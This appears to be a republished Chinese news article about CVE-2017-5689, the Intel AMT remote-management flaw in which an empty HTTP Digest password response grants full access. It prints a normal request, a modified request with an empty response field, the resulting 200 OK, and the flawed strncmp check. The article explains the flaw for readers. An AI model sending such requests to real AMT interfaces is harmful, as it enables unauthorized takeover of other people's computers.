本港台开奖现场直播 j2开奖直播报码现场
当前位置: 新闻频道 > IT新闻 >

【图】只要使用一个空的登录字符串!即可远程劫持采用英特尔不安全芯片的计算机

时间:2017-05-07 20:58来源:本港台直播 作者:本港台直播 点击:
这个漏洞让不法分子得以控制使用vPro和AMT的系统。 你可以远程控制采用易受攻击的英特尔芯片的计算机,只要向它们发送空的验证字符串。 你没有看错,确实如此!本该要求你发送

  这个漏洞让不法分子得以控制使用vPro和AMT的系统。

【图】只要使用一个空的登录字符串!即可远程劫持采用英特尔不安全芯片的计算机

  你可以远程控制采用易受攻击的英特尔芯片的计算机,只要向它们发送空的验证字符串。

  你没有看错,确实如此!本该要求你发送一个哈希值,你却发送了零字节,什么都没有。想想你会有怎样的回报?居然可以通过网络――如果管理接口面向公共Web的话,还可以通过互联网,获得系统硬件的底层访问权,权限很大。

  瞧瞧下一次英特尔(市值1800亿美元的国际半导体巨头)再如何谈论自己对待安全有多重视了。

  概述一下:英特尔为其商务处理器和企业级处理器提供一种名为AMT的远程管理工具包;这个软件是这家芯片巨头的vPro套件的一部分,在固件层面运行,你使用的Windows、Linux或其他任何操作系统根本看不见它。代在英特尔的管理引擎(Management Engine)上运行,这好比是你计算机中的一个小型计算机,全面控制硬件,可与网络端口直接联系,不管运行的是什么样的操作系统和应用程序,都可以控制设备。

  AMT旨在让IT管理员可以远程登录进入到系统底层,atv,那样他们可以重启崩溃的机器,修复和调整操作系统,安装新的操作系统,访问虚拟串行控制台,或者通过VNC获得全面的远程桌面访问。它简直就是上帝模式(god mode)。

  AMT通常由密码保护。本周却爆出了可以绕过这道验证的消息,atv,让不法分子一旦潜入企业网络内部,就可以远程掌控系统。这个严重安全漏洞名为CVE-2017-5689。虽然英特尔已给代码打上了补丁,但用户仍得向硬件供应商索要必要的更新版,以便安装。

  今天我们获悉,钻这个安全漏洞的空子轻而易举,不需要密码,谁都可以控制易受攻击的系统――我们仍在等待相应的补丁。

  AMT是通过一种普通的Web接口经由网络来访问的:该服务侦听端口16992和端口16993。用浏览器访问该服务会弹出提示,要求输入密码,这个密码是使用标准的HTTP Digest验证技术来发送的:使用来自AMT固件的随机数(nonce)以及另外几个元数据,对用户和密码进行哈希处理(即加密)。这个经过加密的响应由英特尔的AMT软件来核实,验证是否有效;如果有效,就将访问权授予管理接口。

  但是如果你发送空的响应,固件就会误以为这是有效的响应,让你长行直入。这意味着,如果你使用代理,将响应改成空的字符串,或者以其他方式设置浏览器,发送空的HTTP Digest验证响应,就可以绕过密码核实机制。

  大致说来,在后台,你的浏览器通常会向AMT服务发送类似这样的内容,这包括哈希响应字符串,含有用户名、密码和服务器随机数:

  GET /index.htm HTTP/1.1

  Host: 192.168.1.2:16992

  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101

  Firefox/45.0

  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

  Accept-Language: en-US,en;q=0.5

  Accept-Encoding: gzip, deflate

  Referer: :16992/logon.htm

  Connection: keep-alive

  Authorization: Digest username=»admin»,

  realm=»Digest:048A0000000000000000000000000000»,

  nonce=»Q0UGAAQEAAAV4M4iGF4+Ni5ZafuMWy9J», uri=»/index.htm»,

  response=»d3d4914a43454b159a3fa6f5a91d801d», qop=auth, nc=00000001,

  cnonce=»9c5beca4011eea5c»

  好了,对此耍个小花招――使用代理或类似的工具,只要去掉响应哈希,改而发送:

  GET /index.htm HTTP/1.1

  Host: 127.0.0.1:16992

  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101

  Firefox/45.0

  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

  Accept-Language: en-US,en;q=0.5

  Accept-Encoding: gzip, deflate

  Connection: keep-alive

  Authorization: Digest username=»admin»,

  realm=»Digest:048A0000000000000000000000000000»,

  nonce=»qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n», uri=»/index.htm», response=»»,

  qop=auth, nc=00000001, cnonce=»60513ab58858482c»

  而英特尔的“保安”(固件)会让你进入,尽管你实际上根本没有密码,只是向门卫闪了一下车灯:

  HTTP/1.1 200 OK

  Date: Thu, 4 May 2017 16:09:17 GMT

  Server: AMT

  Content-Type: text/html

  Transfer-Encoding: chunked

  Cache-Control: no cache

  Expires: Thu, 26 Oct 1995 00:00:00 GMT

  如果你在英特尔的固件里面捣鼓一番,会发现底层的这个宝贝:机器码,机器码反编码成类似以下内容的C代码:

  if(strncmp(computed_response, user_response, response_length))

  deny_access();

(责任编辑:本港台直播)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
栏目列表
推荐内容